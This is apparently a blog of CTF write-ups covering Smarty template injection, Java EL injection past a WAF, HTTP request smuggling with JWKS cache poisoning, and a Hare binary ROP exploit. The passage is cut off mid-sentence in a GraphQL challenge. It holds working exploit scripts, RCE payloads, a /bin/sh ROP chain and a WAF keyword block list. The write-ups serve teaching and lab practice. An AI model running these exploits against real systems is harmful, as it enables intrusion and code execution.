This challenge was mostly the same of the 1337up CTF 2023, called Smarty Pants
, which I solved :)
It comes with the following PHP source:
<?php
if(isset($_GET['source'])){
highlight_file(__FILE__);
die();
}
require('/var/www/vendor/smarty/smarty/libs/Smarty.class.php');
$smarty = new Smarty();
$smarty->setTemplateDir('/tmp/smarty/templates');
$smarty->setCompileDir('/tmp/smarty/templates_c');
$smarty->setCacheDir('/tmp/smarty/cache');
$smarty->setConfigDir('/tmp/smarty/configs');
$pattern = '/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/s';
if(!isset($_POST['data'])){
$smarty->assign('pattern', $pattern);
$smarty->display('index.tpl');
exit();
}
// returns true if data is malicious
function check_data($data){
global $pattern;
return preg_match($pattern,$data);
}
if(check_data($_POST['data'])){
$smarty->assign('pattern', $pattern);
$smarty->assign('error', 'Malicious Inputs Detected');
$smarty->display('index.tpl');
exit();
}
$tmpfname = tempnam("/tmp/smarty/templates", "FOO");
$handle = fopen($tmpfname, "w");
fwrite($handle, $_POST['data']);
fclose($handle);
$just_file = end(explode('/',$tmpfname));
$smarty->display($just_file);
unlink($tmpfname);
It basically:
The Smarty template allows us to use advanced functions, by using template tags enclosed by curly braces: {
and }
.
e.g:
<h1>{$title|escape}</h1>
<ul>
{foreach $cities as $city}
<li>{$city.name|escape} ({$city.population})</li>
{foreachelse}
<li>no cities found</li>
{/foreach}
</ul>
The Smarty documentation gives us a simple solution for getting the flag:
The fetch function allows us to display the contents of a file, as simple as that:
{fetch file='/flag.txt'}
This template tag fetches the flag, but is blocked by the Regex filter. On the CTF challenge, the filter was this:
/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/
To bypass this filter, I used an unintended solution, which was a line break:
{fetch file='/flag.txt'
}
That gave us the CTF challenge flag.
INTIGRITI{php_4nd_1ts_many_f00tgun5}
On the December challenge, there was a small, but deadly change on the RegEx filter. The s
in the end:
/(\b)(on\S+)(\s*)=|javascript|<(|\/|[^\/>][^>]+|\/[^>][^>]+)>|({+.*}+)/s
This small modifier makes the .
match the newline, which blocks our previous solution.
While studying ways to bypass the regex, I found that big strings can break the regex: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp#length-error-bypass
So, the plan was to send a huge string. At first, I was blocked by HTTP 413, but working on the size, I found the right size to break it.
"{fetch file='/flag.txt'}"+("a"*1000000)
This is basically the same payload, with a lot of a
’s after it.
The final exploit was this:
import requests
data = {
'data': "{fetch file='/flag.txt'}"+("a"*1000000),
}
response = requests.post('https://challenge-1223.intigriti.io/challenge.php', data=data)
print(response.status_code)
print(response.text)
And by running it, we get the flag:
$ python int_dez23.py | cut -c-100
200
INTIGRITI{7h3_fl46_l457_71m3_w45_50_1r0n1c!}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Flag
INTIGRITI{7h3_fl46_l457_71m3_w45_50_1r0n1c!}
Just found I can also RCE with the {system}
function.
{system('cat /flag.txt')}aaa...
python int_dez23.py | cut -c-100
200
challenge.php
index.php
resources
The impact is higher :)
SekaiCTF is a Capture The Flag event hosted by Team Project Sekai, with some hardcore members of CTF Community.
Web challenges were fun. Worked in 3, solved 2.
That was a hell of a teamwork with Regne, Rafael, Natã and Alisson.
In this challenge, you are presented with a Contact List. After adding, it shows the contacts on the top of the page.
Looks like some typical XSS challenge, but there is no bot involved, so it’s something else.
We can use the source-code of the challenge to run locally.
$ ./build-docker.sh
Sending build context to Docker daemon 949.2kB
Step 1/12 : FROM gradle:7.5-jdk11-alpine AS build
---> 90b77c8e5ac0
Step 2/12 : COPY --chown=gradle:gradle build.gradle settings.gradle /home/gradle/frogwaf/
... BUNCH OF LINES
Successfully built a688b08fada6
Successfully tagged sekai_web_waffrog:latest
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/////////@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@////////*************@@@@@@@@@@@////////*************(@@@@@@@@
@@@@@@@@@@@@@@@/////*****************************/////********************@@@@@@
@@@@@@@@@@@@@////*///%%%(//////#%#/****************************////%%///*,%%@@@@
@@@@@@@@@@@@////%%////,,,,,,.....,,,%***********************///%//,,,,...,,,%@@@
@@@@@@@@@@@///#%///,,,,,,,,%&/,,,,.,,#********************///%//,,,,,,&&/ &&*%@@
@@@@@@@@@@///%%///,,,,&&&&&&% &&&,,,,%******************///%//,,,,&&&&&&&&&&%@@
@@@@@@@@/////%///*,,&&&&&&&&&&&&&&&,,,%*****************///%//*,,,&&&&&&&&&&&%@@
@@@@@@@/////(%////,,,&&&&&&&&&&&&(,,,,%*****************///%///,,,,,,&&&&&,,%%@@
@@@@@@///////%%////,,,,,,,,,,,,,,,,,,%****************..*//%%///,,,,,,,,,,(%&@@@
@@@@//////////%%%////,,,,,,,,,,,,,,%/*****************,..*//%%/////,,,,/%%//@@@@
@@@//////////////%%%%/////////(%%#/********************...**//#%%%%%%%%//**/*@@@
@@/////*********///////////////**************************....***************//@@
@@/////*************************************(/********(((****,.*************//(@
@@/////**.(*******************************.(((********.((.****************//(,@@
@@/////*,.((/*****************************..*************,*************//((,..@@
@@@////***(*,,,((//*************************************************//((,,...@@@
@@@@////**,,,...,,,,(((////**************************,....****///(((,,,....%@@@@
@@@@@@///**,,,......,,,,,,,(((((/////////**********////////(((*,,,,.......@@@@@@
@@@@@@@///*,,,,...........,,,,,,,,,,,,,/((((((((((((,,,,,...,,...........@@@@@@@
@@@@@@@@@///,,,,....................,,,,,,,,,,,,,,,,,,.................@@@@@@@@@
@@@@@@@@@@@//,,,,,..................................................,@@@@@@@@@@@
@@@@@@@@@@@@@#/,,,,,..............................................,%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@/,,,,,,........................................,,@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@%,,,,,,,.................................,,,(@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,.......................,,,,,%@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
2023-09-03 15:41:10.974 INFO 1 --- [ main] com.sekai.app.Application : Starting Application on 5ee0fb50de34 with PID 1 (/opt/frogwaf/frogwaf-0.0.1-SNAPSHOT.jar started by app in /)
... ANOTHER BUNCH OF LINES
2023-09-03 15:48:53.574 INFO 1 --- [nio-1337-exec-1] o.s.web.servlet.DispatcherServlet : Completed initialization in 18 ms
Now, the app is available on http://localhost:1337.
(Judging by the last CTFs I played, hackers are relly addicted to frogs).
First place to look here is the Dockerfile.
FROM gradle:7.5-jdk11-alpine AS build
COPY --chown=gradle:gradle build.gradle settings.gradle /home/gradle/frogwaf/
COPY --chown=gradle:gradle src/ /home/gradle/frogwaf/src/
WORKDIR /home/gradle/frogwaf
RUN gradle bootJar
FROM openjdk:11-slim
COPY flag.txt /flag.txt
RUN mv /flag.txt /flag-$(head -n 1000 /dev/random | md5sum | head -c 32).txt
RUN addgroup --system --gid 1000 app && adduser --system --group --uid 1000 app
COPY --chown=app:app --from=build /home/gradle/frogwaf/build/libs/*.jar /opt/frogwaf/
USER app
ENTRYPOINT ["java", "-jar", "/opt/frogwaf/frogwaf-0.0.1-SNAPSHOT.jar"]
Dockerfile Summary
In my local container:
$ docker exec -it sekai_web_waffrog bash -c "ls -l flag*"
-rw-rw-r-- 1 root root 17 Aug 16 16:09 flag-453b00d5b87528dc7324eb2e93c709b5.txt
The name is generated at build-time, so it’s different on the actual challenge server.
There is a lot of files, so I won’t go into details in everyone. Let’s see some important files:
// ... Java verbosities
@Getter
@Setter
@Entity
public class Contact {
@Id
@GeneratedValue
private Long id;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String firstName;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String lastName;
@NotNull
@Pattern(regexp = "^[A-Z][a-z]{2,}$")
private String description;
@NotNull
@CheckCountry
private String country;
}
Contact Summary
// ... Java verbosities
@Target({FIELD, METHOD, PARAMETER, ANNOTATION_TYPE, TYPE_USE})
@Retention(RUNTIME)
@Constraint(validatedBy = CountryValidator.class)
@Documented
@Repeatable(CheckCountry.List.class)
public @interface CheckCountry {
String message() default "Invalid country";
Class<?>[] groups() default {};
Class<? extends Payload>[] payload() default {};
@Target({FIELD, METHOD, PARAMETER, ANNOTATION_TYPE})
@Retention(RUNTIME)
@Documented
@interface List {
CheckCountry[] value();
}
}
CheckCountry Summary
A lot of things, but the important is the line below:
@Constraint(validatedBy = CountryValidator.class)
Which takes us to the last piece of important code for now.
// ... Java verbosities
public class CountryValidator implements ConstraintValidator<CheckCountry, String> {
@SneakyThrows
@Override
public boolean isValid(final String input, final ConstraintValidatorContext constraintContext) {
if (input == null) {
return true;
}
val v = FrogWaf.getViolationByString(input);
if (v.isPresent()) {
val msg = String.format("Malicious input found: %s", v);
throw new AccessDeniedException(msg);
}
val countries = StreamUtils.copyToString(new ClassPathResource("countries").getInputStream(), Charset.defaultCharset()).split("\n");
val isValid = Arrays.asList(countries).contains(input);
if (!isValid) {
val message = String.format("%s is not a valid country", input);
constraintContext.disableDefaultConstraintViolation();
constraintContext.buildConstraintViolationWithTemplate(message)
.addConstraintViolation();
}
return isValid;
}
}
CountryValidator Summary
The vulnerable code is the line below:
constraintContext.buildConstraintViolationWithTemplate(message).addConstraintViolation();
The buildConstraintViolationWithTemplate method processes Java EL. Since we can control part of the message variable, it is basically a Template Injection for us.
To make it simpler, let’s make some valid Payloads, except for the Country, which is our attack surface.
I don’t remember how we got that message
was a variable interpreted in the EL.
Let’s test some payloads on /addContact
route.
{
"firstName":"Hey",
"lastName":"You",
"description":"Abc",
"country":"{message}"
}
{
"violations": [
{
"fieldName": "country",
"message": "Invalid country is not a valid country"
}
]
}
Invalid country
is the default return value of the message
method on the CheckCountry.java interface.
By using the dollar sign, we start to play better games using our message
variable.
{
"firstName":"Hey",
"lastName":"You",
"description":"Abc",
"country":"${message.getClass().toString()}"
}
{
"violations": [
{
"fieldName": "country",
"message": "class java.lang.String is not a valid country"
}
]
}
Nice. So, let’s just use EL to get RCE using the Runtime class, right? Wait A Freaking minute…
Now is the time we arrive on the challenge name, which is the WAF. Let’s take a look at the WAF request Interceptor.
// ... Java verbosities
@Configuration
@Order(Integer.MIN_VALUE)
public class FrogWaf implements HandlerInterceptor {
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object obj) throws Exception {
// Uri
val query = request.getQueryString();
if (query != null) {
val v = getViolationByString(query);
if (v.isPresent()) {
throw new AccessDeniedException(String.format("Malicious input found: %s", v));
}
}
return true;
}
public static Optional<WafViolation> getViolationByString(String userInput) {
for (val c : AttackTypes.values()) {
for (val m : c.getAttackStrings()) {
if (userInput.contains(m)) {
return Optional.of(new WafViolation(c, m));
}
}
}
return Optional.empty();
}
}
WAF Summary
The getViolationByString
function checks if a string contains a violation of the WAF.
It is used when validating the Country.
The preHandle
function checks the queryString, but it is useless for solving the challenge.
Let’s check the WAF rules.
// ... Java verbosities
public enum AttackTypes {
SQLI("\"", "'", "#"),
XSS(">", "<"),
OS_INJECTION("bash", "&", "|", ";", "`", "~", "*"),
CODE_INJECTION("for", "while", "goto", "if"),
JAVA_INJECTION("Runtime", "class", "java", "Name", "char", "Process", "cmd", "eval", "Char", "true", "false"),
IDK("+", "-", "/", "*", "%", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
@Getter
private final String[] attackStrings;
AttackTypes(String... attackStrings) {
this.attackStrings = attackStrings;
}
}
WAF Filters Summary
OK, now we got a really restrictive filter for a lot of kinds of attacks. Let’s check our previous payload using some of the forbidden keywords.
Payload
${".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
Response
Malicious input found: Optional[WafViolation(attackType=SQLI, attackString=")]
The reponse comes as HTML, because we’re blocked by the WAF. Let’s make it a little simpler:
Payload
${java.lang.Runtime}
Response
Optional[WafViolation(attackType=JAVA_INJECTION, attackString=Runtime)]
Some words shall not be spoken.
Although the WAF blocks a lot of important keywords and chars, it allows us some basic important chars:
()
.
[]
lang, size, ..
We have to build from here, using Java Reflection, but it gives us a lot of powers.
First of all, two classes will help us get the rest:
java.lang.String
(showed in the first payload)java.lang.Class
To get the Class, we just need another getClass():
Payload
${message.getClass().getClass().toString()}
Response
class java.lang.Class is not a valid country
We can avoid a lot of basic strings, but we really need numbers. We came out with a simple (but verbose) solution, using array sizes.
Payload
${[null, null, null, null].size()}
Response
4 is not a valid country
We can call dynamic methods from classes using the getMethods
method and acessing them by their index.
For finding classes by name to instantiate, we would like to use the Class.forName method, but the for
and Name
strings are blocked.
Since forName is the 2nd method of Class, we call get the method by Index.
Payload
${message.getClass().getClass().getMethods()[[null, null].size()]}
Response
public static java.lang.Class java.lang.Class.forName(java.lang.String) throws java.lang.ClassNotFoundException is not a valid country
We had to loop through some classes methods to find the right indexes. Using this same concept, we can call the substring method, from the String class we already have access.
As with numbers, we need strings to compose our calls (like class names for the Class.forName call). We can’t just send strings, because single and double quotes are blocked. We need some existing strings.
At first we have the message
variable, but we don’t have enough of the alphabet in there.
It gets complex here to summarize, but let’s try.
Since we can navigate on all methods and fields from classes java.lang.String
and java.lang.Class
, and convert their names to String, we can use the substring on them to get most of the alphabet.
To do it, we first built a dicionary of substring origins to compose strings.
Since the plus-sign is also blocked, we can use String.concat
to make the magic.
It would be something like that (“simplified” version):
message.getClass().getMethods()[12].toString().substring(12,1).concat(message.getClass().getMethods()[14].toString().substring(40,1))
…
Now we don’t have all ASCII table, but we have enough alphabet to use java.lang.Character.toString(int char)
.
That would be something like that to get ASC A
:
Class.forName("java.lang.Character").getMethods()[5].invoke(null, 65)
We can write a complete string generator, with any char, bypassing WAF restrictions.
Now we can instantiate any class and call any methods, with any strings and numbers as parameters.
We can compose the components to use java.lang.Runtime
to RCE. The plan is to use something like that below.
${message.getClass().forName("java.lang.Runtime").getRuntime().exec("ls")}
We need to also read the result of the command, so we have to compose the result of the read (assuming 1-line result, to simplify):
${
new BufferedReader(
new InputStreamReader(
message.getClass().forName("java.lang.Runtime").getRuntime().exec("ls -l").getInputStream()
)
).readLine();
}
When calling ls -l
, we got the first line.
total 68 is not a valid country
This is the number of files in the /
directory.
RCE is here. Almost there.
For a reason I didn’t know at challenge time, commands with some special bash characters (*
, |
) were not working. Since the flag name is random, we need to find it.
Rafael came out with a find
by permission to get just the flag file name in the first result line.
find / -maxdepth 1 -type f -perm 0664
Result:
/flag-7662fe897b3335f35ff4c3c81b9e6371.txt
Now, let’s just cat it (locally):
SEKAI{7357_fl46} is not a valid country
On the challenge server:
SEKAI{0h_w0w_y0u_r34lly_b34t_fr0g_wAf_c0ngr4ts!!!!}
Fun for the whole CTF Family!
The solution could be probably simpler on the Java side. For reading the process output, I could maybe read all of the output in one function, without all of the Java usual bullshiting.
I heard later that Runtime class has some issues with special characters we need for bash. I don’t know details yet, but that explains why we couldn’t just get the flag in a simpler way.
Java has some cool modern stuff, but I only know it from darker times.
Also the final payload got huge! (120k chars) I saw a much smaller one (24k chars) on Discord.
Just saw the official solution and I think we got somewhat close :) Their solution for numbers was MUCH better.
The source-code of the challenge is also available here, so you can follow it locally.
We basically create posts here and we can see the post content on a URL with the format:
http://localhost:8080/post/<user_uuid>/<post_uuid>
On my sample:
http://localhost:8080/post/0c0b30cf-3d4b-470c-8486-e90ef9d6a778/ffce8a86-652c-4c70-88bb-afa6e182301e
This is not an XSS challenge, so we will look for a more direct attack.
The post itself is just a boring concatenation of the title with the content.
Let’s find our objective here: the flag is available only on the blog app. Since there is a lot of code, I wont go into details, but there is a /admin
path that we need to understand:
from flask import Blueprint, request, session
import os
import jwt
import requests
admin_bp = Blueprint("admin", __name__, url_prefix="/admin")
jwks_url_template = os.getenv("JWKS_URL_TEMPLATE")
valid_algo = "RS256"
def get_public_key_url(user_id):
return jwks_url_template.format(user_id=user_id)
def get_public_key(url):
resp = requests.get(url)
resp = resp.json()
key = resp["keys"][0]["x5c"][0]
return key
def has_valid_alg(token):
header = jwt.get_unverified_header(token)
algo = header["alg"]
return algo == valid_algo
def authorize_request(token, user_id):
pubkey_url = get_public_key_url(user_id)
if has_valid_alg(token) is False:
raise Exception(
"Invalid algorithm. Only {valid_algo} allowed!".format(
valid_algo=valid_algo
)
)
pubkey = get_public_key(pubkey_url)
print(pubkey, flush=True)
pubkey = "-----BEGIN PUBLIC KEY-----\n{pubkey}\n-----END PUBLIC KEY-----".format(
pubkey=pubkey
).encode()
decoded_token = jwt.decode(token, pubkey, algorithms=["RS256"])
if "user" not in decoded_token:
raise Exception("user claim missing!")
if decoded_token["user"] == "admin":
return True
return False
@admin_bp.before_request
def authorize():
if "user_id" not in session:
return "User not signed in!", 403
if "Authorization" not in request.headers:
return "No Authorization header found!", 403
authz_header = request.headers["Authorization"].split(" ")
if len(authz_header) < 2:
return "Bearer token not found!", 403
token = authz_header[1]
if not authorize_request(token, session["user_id"]):
return "Authorization failed!", 403
@admin_bp.route("/flag")
def flag():
return os.getenv("FLAG")
The /admin/flag
give us the flag, but the price is an Authorization header with JWT token. This token should be signed with a private RSA key, which we don’t have.
The public key for decoding is available for us at the URL:
http://localhost:8080/any_string/.well-known/jwks.json
The any_string
is supposed to be a user uuid, but it does not validate it.
{
"keys": [
{
"alg": "RS256",
"x5c": [
"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqwbbx3Ih7YDR+GB9kX+3\nZ/MXkVyj0Bs+E1rCph3XyAEDzft5SgK/xq4SHO48RKl+M17eJirDOnWVvHqnjxyC\nig2Ha/mP+liUBPxNRPbJbXpn9pmbYLR/7LIUvKizL9fYdYyQnACLI1OdAD/PKLjQ\nIAUGi6a8L37VQOjmf6ooLOSwKdNq/aM4eFpciKNZ3gO0YMc6SC17Jt/0L9aegxqt\nVwEXQou1/yisLuzEY6LmKEbTXuX9oSVFzd/FXi2xsLrD4nqI/HAiRoYnK1gAeglw\nF23h8Hc8jYoXgdZowt1+/XuDPfHKsP6f0MLlDaJAML2Ab6fJk3B1YkcrAZap4Zzu\nAQIDAQAB"
]
}
]
}
OK, the public key is there, but we can’t do nothing to use it.
Some things to note here:
/admin/flag
, with an Authorization Header that will decode successfully.After many years of guys like you hacking stuff, modern HTTP servers have many security protections, but you can’t expect that from small custom projects. That is the cause for our cache server.
When you have multiple web servers working in a chained fashion, we can try a Request Smuggling approach.
I wont explain that in details because it will never get better than guys at PortSwigger did on the link above.
If you want to learn even more, I suggest reading the excellent Request Smuggling research articles from PortSwigger research, mostly by the master-hacker-defcon-talker James Kettle a.k.a. albinowax.
To summarize: the custom cache uses the Content-Length
header to know the size of the post. The HTTP specification says that Transfer-Encoding
is prioritized over Content-Length
, but our custom cache just ignored that.
(And now we know why the name of the challenge is Chunky
)
Nice, we can smuggle requests…
One of the options available with Request Smuggling is Cache Poisoning.
While smuggling the second request (B)
inside the first one (A)
, the backend tries to send the (B)
response, but the font-end does not read it, because it is supposed to have sent the complete answer.
When we send a third request (C)
, the front-end send it to the backend, but receives the response from (B)
, which is still enqueued!
If the front-end is a cache - our scenario - it caches the content of (B)
for the URL of (C)
.
OK, let’s try it prettier.
Since this concept may be hard to follow, let’s follow the flow on the numbers.
If you look as vertices 4 and 9, we have our first desync: cache sends 1 request, but nginx understands that as 2.
That will result, later, in the vertex 16, where the answer to /post/C
will be the response of /post/B
that is waiting to be written to the socket from nginx.
That means, future GETs to post C will get the content of B.
But… we still need to use it to get the flag.
Since we have a plan to control the contents of some URLs through Cache Poisoning, we can poison our user JWKS URL with a controlled content.
Now we can use a kind of JWKS Spoofing, creating a post content with the same format of the JWKS from the app, but using a public key from a pair created by us :)
Let’s view the same diagram again, but with this plan in mind.
Now we have a plan.
The exploit has some basic functions to signup
, login
and create_post
, that we will need in the attack.
We generated the key-pair local_key3 and local_key3.pub, that we will use to poison our JWKS URL.
3 files that compose the templates of the requests that we will send, as in the Diagram:
desync1.txt
== POST A
Content-Length
and Transfer-Encoding
headers, that will cause our desync.desync2.txt
== GET /post/<user_uuid>/<post_uuid_of_poisoned_jwks>
desync3.txt
== GET /user_uuid/.well-known/jwks.json
The complete workflow of the final exploit is:
/admin/flag
with the token from (6)Run!!
$ python attack.py nep500
===== SIGNUP
/login
===== LOGIN
/
===== POST
URL: /post/e8b30077-4b64-4582-8027-f3bf17b679c1/3d1121b4-02e8-4976-bb47-53787c4b2d96
USER_ID: e8b30077-4b64-4582-8027-f3bf17b679c1
POST_ID: 3d1121b4-02e8-4976-bb47-53787c4b2d96
===== DESYNC!!
[+] Opening connection to localhost on port 8080: Done
===============> First Response (Expect Error 400)
b'<!doctype html>\n<html lang=en>\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to the target URL: <a href="/post/e8b30077-4b64-4582-8027-f3bf17b679c1/9a3fc219-5c92-45d2-9800-efb517f61799">/post/e8b30077-4b64-4582-8027-f3bf17b679c1/9a3fc219-5c92-45d2-9800-efb517f61799</a>. If not, click the link.\n'
===============> End of First Response
===============> Second Response (Expect Fake Key)
b'{"keys": [{"alg": "RS256", "x5c": ["MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoRX6bRm8JoyCYxmWkhMw\\nlK9qdgcINZ7oy9jFNtsa0o+2vIafzsLKpVL3CbRgqQua1I6k1QXsXAS8/FDnTOHb\\nJ8HiJcl6xv//cohwkzKriYzWNF9o0bKl6S2WsAoEuVpB4HDD0kHYHZZsyAwVbHvv\\nNqlrndrYMlhSWLzXD3VK6w7OIMIC3reE7Urlf5oMVA1D8KOcVfuEBcXyb1yYVSnC\\n9Jy2NIGcZD0mlq3zekhR86ex08QqX5DSZ0djVZQIIH0f7JtiU9rM1UZCek+iVTQO\\n6aBs+wHojv2DkM/4AYblDUVUTO3+kgJlJEzIzgUjhTrcNL4Xi+nEKl3Go2Qs4nvH\\n/wIDAQAB\\n-----END PUBLIC KEY-----"]}]}\n'
===============> End of Second Response
==========
===== Test Poisoned Cache!!
200
{"keys": [{"alg": "RS256", "x5c": ["MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoRX6bRm8JoyCYxmWkhMw\nlK9qdgcINZ7oy9jFNtsa0o+2vIafzsLKpVL3CbRgqQua1I6k1QXsXAS8/FDnTOHb\nJ8HiJcl6xv//cohwkzKriYzWNF9o0bKl6S2WsAoEuVpB4HDD0kHYHZZsyAwVbHvv\nNqlrndrYMlhSWLzXD3VK6w7OIMIC3reE7Urlf5oMVA1D8KOcVfuEBcXyb1yYVSnC\n9Jy2NIGcZD0mlq3zekhR86ex08QqX5DSZ0djVZQIIH0f7JtiU9rM1UZCek+iVTQO\n6aBs+wHojv2DkM/4AYblDUVUTO3+kgJlJEzIzgUjhTrcNL4Xi+nEKl3Go2Qs4nvH\n/wIDAQAB\n-----END PUBLIC KEY-----"]}]}
==========
200
SEKAI{1337}
On the actual challenge server we got:
SEKAI{tr4nsf3r_3nc0d1ng_ftw!!}
Really fun challenge from a subject I was studying the concepts but never took to practice. It may get a lot counter-intuitive, but the challenge help me understand this scenario much better.
Hello, folks! It’s been a long time since my last write-up and there goes a short one. Harem scarem was a cool challenge from corCTF. It was a pwnable challenge, at first sight, We though it was about some fancy heap exploitation, but, turns out it was much simpler.
The source code of the challenge was provided and you can check it below.
use fmt;
use bufio;
use bytes;
use os;
use strings;
use unix::signal;
const bufsz: u8 = 8;
type note = struct {
title: [32]u8,
content: [128]u8,
init: bool,
};
fn ptr_forward(p: *u8) void = {
if (*p == bufsz - 1) {
fmt::println("error: out of bounds seek")!;
} else {
*p += 1;
};
return;
};
fn ptr_back(p: *u8) void = {
if (*p - 1 < 0) {
fmt::println("error: out of bounds seek")!;
} else {
*p -= 1;
};
return;
};
fn note_add(note: *note) void = {
fmt::print("enter your note title: ")!;
bufio::flush(os::stdout)!;
let title = bufio::scanline(os::stdin)! as []u8;
let sz = if (len(title) >= len(note.title)) len(note.title) else len(title);
note.title[..sz] = title[..sz];
free(title);
fmt::print("enter your note content: ")!;
bufio::flush(os::stdout)!;
let content = bufio::scanline(os::stdin)! as []u8;
sz = if (len(content) >= len(note.content)) len(note.content) else len(content);
note.content[..sz] = content[..sz];
free(content);
note.init = true;
};
fn note_delete(note: *note) void = {
if (!note.init) {
fmt::println("error: no note at this location")!;
return;
};
bytes::zero(note.title);
bytes::zero(note.content);
note.init = false;
return;
};
fn note_read(note: *note) void = {
if (!note.init) {
fmt::println("error: no note at this location")!;
return;
};
fmt::printfln("title: {}\ncontent: {}",
strings::fromutf8_unsafe(note.title),
strings::fromutf8_unsafe(note.content)
)!;
return;
};
fn handler(sig: int, info: *signal::siginfo, ucontext: *void) void = {
fmt::println("goodbye :)")!;
os::exit(1);
};
export fn main() void = {
signal::handle(signal::SIGINT, &handler);
let idx: u8 = 0;
let opt: []u8 = [];
let notes: [8]note = [
note { title = [0...], content = [0...], init = false}...
];
let notep: *[*]note = ¬es;
assert(bufsz == len(notes));
for (true) {
fmt::printf(
"1) Move note pointer forward
2) Move note pointer backward
3) Add note
4) Delete note
5) Read note
6) Exit
> ")!;
bufio::flush(os::stdout)!;
opt = bufio::scanline(os::stdin)! as []u8;
defer free(opt);
switch (strings::fromutf8(opt)!) {
case "1" => ptr_forward(&idx);
case "2" => ptr_back(&idx);
case "3" => note_add(¬ep[idx]);
case "4" => note_delete(¬ep[idx]);
case "5" => note_read(¬ep[idx]);
case "6" => break;
case => fmt::println("Invalid option")!;
};
};
};
Correct me if I’m wrong, but we believe the challenge was written in Hare programming language.
Driving through the source code, we can figure out the vulnerability, it lies in the ptr_back
function:
fn ptr_back(p: *u8) void = {
if (*p - 1 < 0) {
fmt::println("error: out of bounds seek")!;
} else {
*p -= 1;
};
return;
};
The type of p
is unsigned, so *p-1
will never be less than 0. We can make idx
be equal to 0xa
and get $RIP
control. Also, we can leak the stack address
through the function note_read
.
The full exploit is provided below.
#!/usr/bin/env python
from pwn import *
import sys
def pa(addr):
info("%#x", addr)
def move_ptr_back():
p.sendlineafter(b'>', b'2')
def note_add(title, content):
p.sendlineafter(b'>', b'3')
p.sendlineafter(b'title:', title)
p.sendlineafter(b'content:', content)
def read_note():
p.sendlineafter(b'>', b'5')
def exploit():
for i in range(246):
move_ptr_back()
if REMOTE:
note_add(b'AAA', b'BBB')
# leak stack address
read_note()
p.recvuntil('content:')
p.recv(15)
stack_leak = u64(p.recv(8))
pa(stack_leak)
rop_chain = b'B' * 14
rop_chain += p64(stack_leak+8) # RBP -> RSP+8
rop_chain += p64(0x800496b) # clc ; mov rax, qword ptr [rbp - 8] ; leave ; ret)
rop_chain += p64(0x3b) # execve syscall number
rop_chain += p64(stack_leak+48) # RBP -> RSP+48
rop_chain += p64(0x80169cc) # pop rsi ; pop r13 ; pop r12 ; pop rbx ; leave ; ret
rop_chain += p64(stack_leak+32) # rsi
rop_chain += b'/bin/sh\x00' # r13
rop_chain += p64(0) # r12
rop_chain += p64(0xbabebabe) # rbx
rop_chain += p64(0x801a452) # clc ; mov rdi, rsi ; mov rsi, rdx ; syscall
note_add(b'AAABBBCCC', rop_chain)
p.interactive()
if __name__ == '__main__':
REMOTE = len(sys.argv) > 1
if REMOTE:
p = remote(sys.argv[1], int(sys.argv[2]))
p.recvuntil('-s ')
pof_ps = process(['./pow', p.recvline().strip()])
pof = pof_ps.readline()
p.sendline(pof)
else:
p = process(['./harem'])
exploit()
corCTF is maintained by the Crusaders of Rust Team. The 2023 edition happened between 28 and 30-JUL.
This is a great CTF for Web with some really hard and creative challenges.
I worked on 4 challenges and solved 3.
In this challenge, you are presented with a textarea, where you can write a GraphQL query and send it to the server.
Your mission (should you choose to accept it), is sending the right secret number.
Maybe, among those 118 solves, someone was lucky :) Since that’s never my case, let’s work.
It’s a small NodeJS/Fastify app:
import fastify from 'fastify'
import mercurius from 'mercurius'
import { randomInt } from 'crypto'
import { readFile } from 'fs/promises'
const app = fastify({
logger: true
});
const index = await readFile('./index.html', 'utf-8');
const secret = randomInt(0, 10 ** 5); // 1 in a 100k??
console.log(secret);
let requests = 10;
setInterval(() => requests = 10, 60000);
await app.register(mercurius, {
schema: `type Query {
flag(pin: Int): String
}`,
resolvers: {
Query: {
flag: (_, { pin }) => {
if (pin != secret) {
return 'Wrong!';
}
return process.env.FLAG || 'corctf{test}';
}
}
},
routes: false
});
app.get('/', (req, res) => {
return res.header('Content-Type', 'text/html').send(index);
});
app.post('/', async (req, res) => {
if (requests <= 0) {
return res.send('no u')
}
requests --;
return res.graphql(req.body);
});
app.listen({ host: '0.0.0.0', port: 80 });
GET
to /
returns the index.html static page with our textarea.POST
to /
process the request body (AS IS) as GraphQL and returns the result.
POST
.We have to hit the correct number between 1 and 100k.
We don’t have any information about it (like the previous random), so I wouldn’t try to break it. Maybe you have more faith than me.
Brute-forcing must be the happy path here, since the range is not too big. But since we have a rate-limit of 10 requests/minute, it would take almost 7 days to break. Not enough CTF time for that (and even with an impossible 1-week CTF, instances would stop in 10 minutes).
But we can use a trick here. Our rate-limit is based on the number of POSTs
